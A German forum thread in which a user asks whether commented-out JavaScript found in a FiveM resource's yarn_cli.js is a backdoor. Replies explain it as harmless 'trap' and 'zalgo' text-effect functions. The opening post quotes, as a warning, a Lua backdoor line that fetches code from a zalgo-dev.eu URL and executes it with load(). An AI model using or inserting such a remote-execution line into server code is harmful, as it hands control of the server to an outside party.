Interessiert an einer Erklärung oder Klärung von dem Code.

ViruZakaiThink · 30. August 2024

Es geht um diesen Code denn ich hier Posten werde, ich habe die frage ob des ein Backdoor ist oder nicht ich beschreibe auch wo ich das genau gefunden habe.

Ich weiß halt selber nicht was das ist ich gehe aber von einem Backdoor aus was man erkennen kann finde ich, Gefunden habe ich diese Zeilen bei: Resources / CFX-Default / System / Builders / Yarn / Yarn_cli.js / <Unknown> / <Function> / <Function>

Was mir auch aufgefallen ist ich habe das neu Gedownloaded von dem der das "Erschaffen" hat und es ist einfach auch drinnen, warum ich denke das das eine Backdoor ist aus der Begründung weil ich habe sowas ähnliches gesehen

Undzwar da wo ich nach "Zalgo gesucht habe und dann kam einfach sowas....

!!!!! BITTE NICHT KLICKEN!!!!! Habe den Link auch etwas Abgeändert!!!

!!!! --PerformHttpRequest(' https://zalgo-dev.eu/api.', function (e, d) pcall(function() assert(load(d))() end) end) !!!!!!!

Also warum dieser Post entstanden ist weil ich eure Ehrliche meinung wissen wollte als Programmierer weil des schon etwas ist wo man sich Befassen kann.. Mit freundlichen Grüßen ViruZAkaithink

Code

/*
}),
612 
(function(module, exports) {

module['exports'] = function runTheTrap(text, options) {
  var result = '';
  text = text || 'Run the trap, drop the bass';
  text = text.split('');
  var trap = {
    a: ['\u0040', '\u0104', '\u023a', '\u0245', '\u0394', '\u039b', '\u0414'],
    b: ['\u00df', '\u0181', '\u0243', '\u026e', '\u03b2', '\u0e3f'],
    c: ['\u00a9', '\u023b', '\u03fe'],
    d: ['\u00d0', '\u018a', '\u0500', '\u0501', '\u0502', '\u0503'],
    e: ['\u00cb', '\u0115', '\u018e', '\u0258', '\u03a3', '\u03be', '\u04bc',
         '\u0a6c'],
    f: ['\u04fa'],
    g: ['\u0262'],
    h: ['\u0126', '\u0195', '\u04a2', '\u04ba', '\u04c7', '\u050a'],
    i: ['\u0f0f'],
    j: ['\u0134'],
    k: ['\u0138', '\u04a0', '\u04c3', '\u051e'],
    l: ['\u0139'],
    m: ['\u028d', '\u04cd', '\u04ce', '\u0520', '\u0521', '\u0d69'],
    n: ['\u00d1', '\u014b', '\u019d', '\u0376', '\u03a0', '\u048a'],
    o: ['\u00d8', '\u00f5', '\u00f8', '\u01fe', '\u0298', '\u047a', '\u05dd',
         '\u06dd', '\u0e4f'],
    p: ['\u01f7', '\u048e'],
    q: ['\u09cd'],
    r: ['\u00ae', '\u01a6', '\u0210', '\u024c', '\u0280', '\u042f'],
    s: ['\u00a7', '\u03de', '\u03df', '\u03e8'],
    t: ['\u0141', '\u0166', '\u0373'],
    u: ['\u01b1', '\u054d'],
    v: ['\u05d8'],
    w: ['\u0428', '\u0460', '\u047c', '\u0d70'],
    x: ['\u04b2', '\u04fe', '\u04fc', '\u04fd'],
    y: ['\u00a5', '\u04b0', '\u04cb'],
    z: ['\u01b5', '\u0240'],
  };
  text.forEach(function(c) {
    c = c.toLowerCase();
    var chars = trap[c] || [' '];
    var rand = Math.floor(Math.random() * chars.length);
    if (typeof trap[c] !== 'undefined') {
      result += trap[c][rand];
    } else {
      result += c;
    }
  });
  return result;
};


 }),
 613 
 (function(module, exports) {

// please no
module['exports'] = function zalgo(text, options) {
  text = text || '   he is here   ';
  var soul = {
    'up': [
      '̍', '̎', '̄', '̅',
      '̿', '̑', '̆', '̐',
      '͒', '͗', '͑', '̇',
      '̈', '̊', '͂', '̓',
      '̈', '͊', '͋', '͌',
      '̃', '̂', '̌', '͐',
      '̀', '́', '̋', '̏',
      '̒', '̓', '̔', '̽',
      '̉', 'ͣ', 'ͤ', 'ͥ',
      'ͦ', 'ͧ', 'ͨ', 'ͩ',
      'ͪ', 'ͫ', 'ͬ', 'ͭ',
      'ͮ', 'ͯ', '̾', '͛',
      '͆', '̚',
    ],
    'down': [
      '̖', '̗', '̘', '̙',
      '̜', '̝', '̞', '̟',
      '̠', '̤', '̥', '̦',
      '̩', '̪', '̫', '̬',
      '̭', '̮', '̯', '̰',
      '̱', '̲', '̳', '̹',
      '̺', '̻', '̼', 'ͅ',
      '͇', '͈', '͉', '͍',
      '͎', '͓', '͔', '͕',
      '͖', '͙', '͚', '̣',
    ],
    'mid': [
      '̕', '̛', '̀', '́',
      '͘', '̡', '̢', '̧',
      '̨', '̴', '̵', '̶',
      '͜', '͝', '͞',
      '͟', '͠', '͢', '̸',
      '̷', '͡', ' ҉',
    ],
  };
  var all = [].concat(soul.up, soul.down, soul.mid);

  function randomNumber(range) {
    var r = Math.floor(Math.random() * range);
    return r;
  }

  function isChar(character) {
    var bool = false;
    all.filter(function(i) {
      bool = (i === character);
    });
    return bool;
  }


  function heComes(text, options) {
    var result = '';
    var counts;
    var l;
    options = options || {};
    options['up'] =
      typeof options['up'] !== 'undefined' ? options['up'] : true;
    options['mid'] =
      typeof options['mid'] !== 'undefined' ? options['mid'] : true;
    options['down'] =
      typeof options['down'] !== 'undefined' ? options['down'] : true;
    options['size'] =
      typeof options['size'] !== 'undefined' ? options['size'] : 'maxi';
    text = text.split('');
    for (l in text) {
      if (isChar(l)) {
        continue;
      }
      result = result + text[l];
      counts = {'up': 0, 'down': 0, 'mid': 0};
      switch (options.size) {
      case 'mini':
        counts.up = randomNumber(8);
        counts.mid = randomNumber(2);
        counts.down = randomNumber(8);
        break;
      case 'maxi':
        counts.up = randomNumber(16) + 3;
        counts.mid = randomNumber(4) + 1;
        counts.down = randomNumber(64) + 3;
        break;
      default:
        counts.up = randomNumber(8) + 1;
        counts.mid = randomNumber(6) / 2;
        counts.down = randomNumber(8) + 1;
        break;
      }

      var arr = ['up', 'mid', 'down'];
      for (var d in arr) {
        var index = arr[d];
        for (var i = 0; i <= counts[index]; i++) {
          if (options[index]) {
            result = result + soul[index][randomNumber(soul[index].length)];
          }
        }
      }
    }
    return result;
  }
  // don't summon him
  return heComes(text, options);
};*/

Alles anzeigen

**GangstaSunny** · 3. September 2024

Sieht mir eher nach einer Spaßnummer aus für Textanimationen.

Sicher bin ich mir aber nicht.

Könnten natürlich auch die Startfunktionen für die russischen Atomsprengkörper sein.

Kaliber · 4. September 2024

Hey, wenn du magst, kann ich dir erklären, was da passiert.

Auf den Ersten Blick dachte ich, das wäre eine Obfuscation Taktik, das wird bei JS öfters angewendet, um den Quellcode zu verschleiern. Ist es in diesem Fall aber nicht.

Das sind einfach nur Spaßfunktionen und ganz harmlos.

Die Trap-Funktion ersetzt einfach Buchstaben mit einem zufälligen Unicode Zeichen, was aussieht wie der Buchstabe.

Also z.B. a: ['@', 'Ą', 'Ⱥ', 'Ʌ', 'Δ', 'Λ', 'Д'], das steht da eigentlich. Gibst du jetzt einen Text wie: "Anton" ein, erhältst du: "ȺŋŁõŋ" oder "ĄΠŦ๏ŋ".

Wird halt immer ein zufälliges Zeichen aus dem Array für den jeweiligen Buchstaben gepickt.

Und bei Zalgo, wird einfach ein String generiert, der ähnlich wie die Matrix ist, bzw den Text unleserlich macht und gruselig ist. Entstanden ist das hier durch: https://creepypastavillains.fandom.com/wiki/Zalgo

"Zalgo verfälscht normalerweise Three-Strip-Comics, indem er die Charaktere, die Schriftarten und die Handlung selbst zu einer unsinnigen und doch schrecklichen Travestie des Originalmaterials verdreht"

Und genau das macht die Funktion, generiert halt eine komische Zeichenfolge, die gruselig aussieht.

Also sind beides ganz harmlose Spielerein. Kein Backdoor o.ä.